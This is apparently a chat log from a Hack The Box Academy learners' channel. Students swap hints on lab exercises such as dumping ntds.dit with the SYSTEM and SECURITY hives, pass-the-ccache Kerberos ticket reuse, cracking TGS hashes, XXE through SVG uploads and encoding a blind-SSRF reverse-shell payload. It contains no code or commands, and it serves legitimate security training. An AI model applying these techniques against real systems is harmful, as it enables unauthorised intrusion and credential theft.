system and save are needed at the bare minimum i believe in order to get anything from the ntds.dit; secret is sometimes needed but not always

if you can get all 3, extract all 3

👍

got it guys. thank you for clarifying

These modules where I have to connect to the world's laggiest RDP server and do all my activites from that are brutal lol

they test your patience 😄

hello who can to help me plz for this exo : https://academy.hackthebox.com/module/51/section/476

Hi, am currently doing the Skills Assessment for the module Kerberos Attacks.

Currently stuck at qn 3:Which user allows you to connect, as administrator, to the server with unconstrained delegation?

Will anyone be able to provide any nudges? Thanks!

Hi guys, on "Windows Attacks and Defense | Credentials in Shares", any ideas on how to import Powerview's "invoke sharefinder". The VM is not connected to the internet so I can't download straight from Git, might be being stupid I dont know.

you have domain creds correct? use that to enumerate and carry out some common attacks

the powerview module is on the machine

Hiya, doing the skills assessment for cracking passwords with hashcat. On q4 crack the kerberos TGS ticket hash, when i run it in hashcat i just get no result and status 'exhausted' instantly. Looked up someones walkthrough and my command is exactly the same so not sure why mine isnt working. Anyone know?

im doing one of the sqlmap chall in academy and i keep getting connection error

what would be the issue ya

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I'm stuck in this question any help

I've been banging my head on this Skill assessment (FILE UPLOAD ATTACKS) for over a day now and still haven't got the source code which would probably be containing the upload path.

I've successfully uploaded the SVG containing XXE which would've given me the source code but all it returns is just my payload and noting from the source code... please help somebody...

can anyone help me with this answer? I don't see the problem

how can i share image for doubts here.... plz help

??

did you try doing what the question asked

i mean looking at the visualization

hi, on Server-side Attacks> Blind SSRF Exploitation Example here I have troubles understanding how the reverse shell payload gets double url encoded. I have tried multiple times (using jq as shown in previous section) with different tools, I can't find a way to properly double encode my payload.
The provided payload in the example encode single quotes and parentheses and mine (with jq or other tools) don't.
Any suggestions please ?

Yep

I don't understand what I'm supposed to do here

except put 2023-06-03

did you try 2023-03-06

06-03 is June 3rd

yeah but UK uses a weird format and isn't htb in the uk lol

yep i tried it too

plus if it's not working it's worth a try

i wish i had access to my notes anywhere

that's one reason i use onenote

so there is a date there yes

there are other note taking apps that are online as well

that's not necessarily the date the action occurred

i agree with @dim wolf , it looks like that's simply the date you started the filter, not the results from the search/filter

that's the only thing i can think of right now

notion ❤️

ok i will check this later

thank you

seems like there would be an issue with your payload
Try reviewing the limited file uploads section 😉

what is everyone's favorite module? which one do you think is definitely worth getting?

honestly depends on what you wanna do

i want to do it all lol

i found the investigating with splunk module to be awesome

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

Did anyone here pass the exam already?
Is it similar to Attacking Enterprise Networks module?

Any one knw how to solve this question

i did intro to assembly earlier and that was pretty worth

I'm still a beginner at this but I can confirm that it's very interesting.

@limpid hemlock that's a kerberos credential cache file.

you'll need to perform a pass the ccache attack

I'm stuck I found the files

I try to pass it by copying it

it doesn't work like that

Ah

try googling "pass the ticket ccache"

then look up hacktrickz or something

review this portion in the material Importing the ccache File into our Current Session and it explains how to do it

😢

It's been a while, but your timezone correct?

i don't understand

that's also another thing i considered

when you create the instance of the machine, you have to set the timezone in the settings

i think 😕

I think not 😉

ah maybe

I look and I tell you

I got it people when smbclient and getting flag the command put it in double quotes

great job

Missing to put the command in between Those double quotes costed me a day

🤣

Nah, just means you learned a valuable lession 😂

i bet you will remember it next time 🙂

if your subscription isn't active are you still able to run the VM's for the modules you purchased?

yes

Are you wanting to take an exam or do one of the job paths? If so just follow them in order. If you just want to do the modules just because, my favorite so far was the Active Directory Enumeration & Attacks.

Yess life lesson learned

I'm just wondering what everyone's favorite module is so far that's all. i think the adcs module was a great presentation and delivery of the content

I like adcs, kerberos, relay, cme

those are very well written

i thought about cme, but it's not being developed anymore instead of netexec. i wonder if they'll update it

i'm guessing the same commands apply to netexec though

yes

netexec is a fork that's being updated, that's all

I still need to try out nxc. I just try to use the tools the modules recommend so I got to spend like 45 mins trying to successfully install CME

i thought cme was native in kali

I'm using parrot security. I have to run it via poetry

the netexec folks have an easy way to install it, at least it works for me for the time being

For file upload module I am understanidng how to brute force the extensions to see which allow for upload, however as course says not all extensions will allow for code execution. Is there a better way to do it than just going through the list 1 by 1?

This one just does not want to connect.

Hm, Pwnbox doesn't work either.

The Attacking Thick Clients Module Lab is absolute trash... On hour number 7, and my problem isnt the instruction, it's the slowness of the VM and the behavior of the machine that causes issues and making me reset 3 to 4 times an hour

:❤️

welcome friend

warp the password in single quotes

Well that worked. I don't remember having to do that before

because $$ is a special variable in bash

without escaping it won't get passed correctly in the terminal

Rule of thumb if there is a special character in password best to wrap it in single quootes, just in case

I'll keep that in mind. Wish they'd mentioned that lol